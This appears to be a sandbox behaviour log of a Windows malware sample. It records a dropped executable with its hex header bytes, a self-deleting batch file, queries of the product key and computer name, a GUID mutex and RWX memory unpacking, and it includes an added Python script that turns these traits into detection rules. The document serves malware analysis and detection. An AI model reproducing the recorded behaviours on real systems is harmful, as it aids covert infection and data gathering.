| C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe | none | 257536 | 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 | success or wait | 1 | 411BB1 |
| C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat | none | 244 | 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 | success or wait | 1 | 411BB1 |
+ File read
| File Path | Offset | Length | Value | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe | none | 257536 | 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 | success or wait | 2 | 411C56 |
+ Other file operations
| File Path | Disposition | Data | Ascii Data | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe | BasicInformation | Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary | | success or wait | 2 | 411D43 |
Section Activities:
+ Section loaded by Windows
| File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count |
|---|---|---|---|---|---|---|---|---|
| \KnownDlls\kernel32.dll | write and read and execute | unknown | 7C800000 | 1007616 | own pid | read write | success or wait | 1 |
| unknown | query and write and read and execute and extend size | reserve | 7C800000 | 1007616 | own pid | read write | success or wait | 1 |
| \NLS\NlsSectionUnicode | read | unknown | 270000 | 90112 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionLocale | read | unknown | 290000 | 266240 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortkey | query and read | unknown | 2E0000 | 266240 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortTbls | read | unknown | 330000 | 24576 | own pid | readonly | success or wait | 1 |
| \NLS\NlsSectionSortkey00000409 | read | unknown | 330000 | 24576 | own pid | readonly | object name not found | 1 |
| \NLS\NlsSectionSortkey00000409 | read | unknown | 330000 | 24576 | own pid | readonly | object name not found | 1 |
| \KnownDlls\compstui.dll | write and read and execute | unknown | 330000 | 24576 | own pid | readonly | object name not found | 1 |
| C:\WINDOWS\system32\compstui.dll | query and write and read and execute | image | 6E680000 | 241664 | own pid | read write | success or wait | 1 |
| \KnownDlls\msvcrt.dll | write and read and execute | unknown | 77C10000 | 360448 | own pid | read write | success or wait | 1 |
| \KnownDlls\USER32.dll | write and read and execute | unknown | 7E410000 | 593920 | own pid | read write | success or wait | 1 |
| \KnownDlls\GDI32.dll | write and read and execute | unknown | 77F10000 | 299008 | own pid | read write | success or wait | 1 |
| \KnownDlls\ADVAPI32.dll | write and read and execute | unknown | 77DD0000 | 634880 | own pid | read write | success or wait | 1 |
| \KnownDlls\RPCRT4.dll | write and read and execute | unknown | 77E70000 | 602112 | own pid | read write | success or wait | 1 |
| \KnownDlls\Secur32.dll | write and read and execute | unknown | 77FE0000 | 69632 | own pid | read write | success or wait | 1 |
| \KnownDlls\MSIMG32.dll | write and read and execute | unknown | 77FE0000 | 69632 | own pid | read write | object name not found | 1 |
| C:\WINDOWS\system32\msimg32.dll | query and write and read and execute | image | 76380000 | 20480 | own pid | read write | success or wait | 1 |
| \KnownDlls\VERSION.dll | write and read and execute | unknown | 77C00000 | 32768 | own pid | read write | success or wait | 1 |
| \KnownDlls\SHLWAPI.dll | write and read and execute | unknown | 77F60000 | 483328 | own pid | read write | success or wait | 1 |
| \KnownDlls\ddraw.dll | write and read and execute | unknown | 77F60000 | 483328 | own pid | read write | object name not found | 1 |
| C:\WINDOWS\system32\ddraw.dll | query and write and read and execute | image | 73760000 | 307200 | own pid | read write | success or wait | 1 |
| \KnownDlls\DCIMAN32.dll | write and read and execute | unknown | 73760000 | 307200 | own pid | read write | object name not found | 1 |
| C:\WINDOWS\system32\dciman32.dll | query and write and read and execute | image | 73BC0000 | 24576 | own pid | read write | success or wait | 1 |
| \KnownDlls\resutils.dll | write and read and execute | unknown | 73BC0000 | 24576 | own pid | read write | object name not found | 1 |
| C:\WINDOWS\system32\resutils.dll | query and write and read and execute | image | 750B0000 | 73728 | own pid | read write | success or wait | 1 |
| \KnownDlls\CLUSAPI.dll | write and read and execute | unknown | 750B0000 | 73728 | own pid | read write | object name not found | 1 |
| C:\WINDOWS\system32\clusapi.dll | query and write and read and execute | image | 76D10000 | 73728 | own pid | read write | success or wait | 1 |
| \KnownDlls\ole32.dll | write and read and execute | unknown | 774E0000 | 1302528 | own pid | read write | success or wait | 1 |
| \KnownDlls\OLEAUT32.dll | write and read and execute | unknown | 77120000 | 569344 | own pid | read write | success or wait | 1 |
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\scarddlg.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\scarddlg.dll query and write and read and execute image 5CFE0000 90112 own pid read write success or wait 1
\KnownDlls\MFC42u.DLL write and read and execute unknown 5CFE0000 90112 own pid read write object name not found 1
C:\WINDOWS\system32\mfc42u.dll query and write and read and execute image 72830000 991232 own pid read write success or wait 1
\KnownDlls\WinSCard.dll write and read and execute unknown 72830000 991232 own pid read write object name not found 1
C:\WINDOWS\system32\winscard.dll query and write and read and execute image 723D0000 114688 own pid read write success or wait 1
\KnownDlls\WTSAPI32.dll write and read and execute unknown 723D0000 114688 own pid read write object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\COMCTL32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 5D090000 630784 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 28C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 7C9C0000 8482816 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 360000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\compstui.dll read commit 2DA0000 229376 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 2DA0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 2E20000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 2ED0000 8462336 own pid readonly success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 2ED0000 8462336 own pid readonly object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 7FF0000 667648 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe query and write and read and execute and extend size image 7FF0000 667648 own pid readonly success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit 2E60000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8070000 1208320 own pid readonly success or wait 1
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe query and read commit 2E60000 258048 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image 2E60000 258048 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 8070000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 81A0000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 81A0000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit 81A0000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 81A0000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit 8070000 389120 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir ComputerName success or wait 1 41A95F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft InstallDate success or wait 1 405EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId buffer overflow 2 405F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId success or wait 1 405F7A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44} success or wait 1 41A811
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 0 success or wait 1 428A8D
2152 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat 0 success or wait 1 428A8D
+ Process terminated
PID Filepath Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 41B403
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 0 41B403
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7C811195 1 8B success or wait 1 41B1A4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E40000 13FF9C page execute and read and write success or wait 1 4E4097
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2ED0000 13FCA4 page execute and read and write success or wait 1 2E40307
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7FF0000 13F8E0 page read and write success or wait 1 41A5EB
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 7FF0000 13F8E4 page read and write success or wait 1 41A5EB
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E60000 13F49C page read and write success or wait 1 411C3E
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E60000 13ED10 page read and write success or wait 1 411C3E
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 400000 1000 page read and write page readonly success or wait 1 287F737
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 400000 1000 page readonly page read and write success or wait 1 287F74C
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 40050A 2446000 page execute and read and write page readonly success or wait 1 4E404E
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 412CC7 1000 page execute and read and write page execute and read and write success or wait 2 41E7C5
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 428925
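The tables above record, for the initial process, the events behind the behaviour signatures: a region of the image at 0x40050A re-protected from read-only to RWX, two large RWX allocations, a GUID-named global mutex, an executable dropped under Application Data, and a FileBasicInformation call on that dropped file. The script below is an added example, not part of the Joebox report, that parses rows in the "Operation Key: value ... completion timestamp" form used by the chronological listing and applies those checks as detection rules. The six sample rows are copied from this report; the rule names and checks are my own. Two details a practitioner would want handled: a repeated "New Protection" label in a row is treated as the old protection (the Memory attributes changed table labels the second value "Old Protection"), and timestamps rendered as 01-01-1601 in a BasicInformation call are FILETIME 0, which the kernel reads as "do not change", so that row is reported as an attribute change (archive + temporary) rather than as timestomping.

```python
import re
from dataclasses import dataclass

# Constructed sample: six rows copied from this report's chronological listing,
# one per rule below plus a benign Section loaded row that should match nothing.
SAMPLE = r"""
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2573155734
Memory attributes changed PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 40050A Length: 2446000 New Protection: page execute and read and write New Protection: page readonly success or wait 2593486565
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E40000 Length: 13FF9C Allocation Type: null Protection: page execute and read and write success or wait 2593555385
Mutant created Name: \BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44} success or wait 2597174747
File created Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2597248598
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2598354771
"""

# Field labels seen in the report's rows. Values may contain colons (drive letters,
# 01:00 times), so fields are split on these known labels, not on every colon.
KEYS = ["Allocation Type", "Content Overwritten", "Last Access Time", "Last Write Time",
        "New Protection", "Old Protection", "Creation Time", "File Attributes",
        "Mapped to pid", "Change Time", "Baseaddress", "Disposition", "Protection",
        "Attributes", "Privilege", "On or off", "Options", "Access", "Length", "Offset",
        "Value", "Base", "Data", "Name", "Path", "Size", "Type", "PID"]
KEY_RE = re.compile(r"\b(" + "|".join(re.escape(k) for k in KEYS) + r") ?: ?")
TAIL_RE = re.compile(r"\s+(success or wait|object name not found|buffer overflow)\s+(\d+)$")

RWX = "page execute and read and write"
GUID_MUTEX = re.compile(r"\\Global\\\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
EPOCH = "01-01-1601"   # FILETIME 0 rendered as a date; FileBasicInformation treats 0 as "leave unchanged"


@dataclass
class Event:
    op: str
    fields: dict
    status: str
    time: int


def parse_event(line: str) -> Event:
    """Split one chronological row into operation, labelled fields, completion status and timestamp."""
    line = line.strip()
    tail = TAIL_RE.search(line)
    if tail is None:
        raise ValueError("row has no completion/timestamp tail: " + line[:60])
    body = line[:tail.start()]
    keys = list(KEY_RE.finditer(body))
    op = body[:keys[0].start()].strip() if keys else body.strip()
    fields = {}
    for i, km in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(body)
        key = km.group(1)
        if key == "New Protection" and key in fields:
            key = "Old Protection"   # some rows print the old value under a repeated "New Protection" label
        fields[key] = body[km.end():end].strip()
    return Event(op, fields, tail.group(1), int(tail.group(2)))


def triage(events) -> list:
    """Apply the behaviour checks; returns (rule, description) pairs in event order."""
    findings = []
    for e in events:
        f = e.fields
        path = f.get("Path", "")
        if e.op == "Memory allocated" and f.get("Protection") == RWX:
            findings.append(("rwx-alloc", "PID %s: %d bytes allocated RWX at 0x%s"
                             % (f.get("PID"), int(f["Length"], 16), f["Base"])))
        elif e.op == "Memory attributes changed" and f.get("New Protection") == RWX and f.get("Old Protection") != RWX:
            findings.append(("rwx-reprotect", "PID %s: 0x%s (+0x%s) changed from '%s' to RWX (in-place unpacking of the image)"
                             % (f.get("PID"), f["Base"], f["Length"], f.get("Old Protection"))))
        elif e.op == "File created" and path.lower().endswith(".exe") and "\\application data\\" in path.lower():
            findings.append(("dropped-exe", "executable written under Application Data: " + path))
        elif e.op == "Mutant created" and GUID_MUTEX.search(f.get("Name", "")):
            findings.append(("global-mutex", "GUID-named global mutex (single-instance marker): " + f["Name"]))
        elif e.op == "File other operation" and f.get("Disposition") == "BasicInformation":
            stamps = [f.get(k, "") for k in ("Creation Time", "Last Access Time", "Last Write Time", "Change Time")]
            if all(EPOCH in s for s in stamps):
                findings.append(("attr-only", "%s: attributes set to '%s'; all four timestamps are FILETIME 0, so they stay unchanged (not timestomping)"
                                 % (path, f.get("File Attributes"))))
            else:
                findings.append(("timestomp", "%s: timestamps rewritten to %s" % (path, stamps)))
    return findings


if __name__ == "__main__":
    events = [parse_event(l) for l in SAMPLE.splitlines() if l.strip()]
    for rule, text in triage(events):
        print("[%s] %s" % (rule, text))
```

Run it over the full chronological export rather than the six rows to see the rules fire in order; the Section loaded row shows that ordinary image mapping with "read write" protection produces no finding.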
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2573155734
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2573436053
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2573477701
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2573490013
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2573491214
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2573491988
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573560856
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573561250
Section loaded Path: \KnownDlls\compstui.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2573593423
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: query and write and read and execute Type: image Baseaddress: 6E680000 Size: 241664 Protection: read write Mapped to pid: own pid success or wait 2573670200
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2573747823
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2573815420
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2573822572
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2573835087
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2573839782
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2573846385
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2573855418
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2573857125
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2573916304
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2573944926
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2574094640
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2574096779
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2574102489
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2574105429
Section loaded Path: \KnownDlls\resutils.dll Access: write and read and execute Type: unknown Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2574122690
Section loaded Path: C:\WINDOWS\system32\resutils.dll Access: query and write and read and execute Type: image Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2574125526
Section loaded Path: \KnownDlls\CLUSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2574137835
Section loaded Path: C:\WINDOWS\system32\clusapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D10000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2574147522
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2574773497
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2574784927
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2574797891
Section loaded Path: \KnownDlls\scarddlg.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2574805818
Section loaded Path: C:\WINDOWS\system32\scarddlg.dll Access: query and write and read and execute Type: image Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2574813091
Section loaded Path: \KnownDlls\MFC42u.DLL Access: write and read and execute Type: unknown Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid object name not found 2575329961
Section loaded Path: C:\WINDOWS\system32\mfc42u.dll Access: query and write and read and execute Type: image Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid success or wait 2575333197
Section loaded Path: \KnownDlls\WinSCard.dll Access: write and read and execute Type: unknown Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid object name not found 2575796400
Section loaded Path: C:\WINDOWS\system32\winscard.dll Access: query and write and read and execute Type: image Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid success or wait 2575798716
Section loaded Path: \KnownDlls\WTSAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid object name not found 2575812961
Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2575816085
Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2575955111
Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2575957032
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2576165316
Section loaded Path: \KnownDlls\COMCTL32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2576194206
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid object name not found 2576209722
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576219169
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 28C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2576227212
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2576247867
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2576252487
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2576257238
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2576286481
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid object name not found 2576314527
Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2576316277
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 360000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2576353860
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576641307
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2576653161
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2576655478
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: read Type: commit Baseaddress: 2DA0000 Size: 229376 Protection: readonly Mapped to pid: own pid success or wait 2576783674
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 2DA0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2577059255
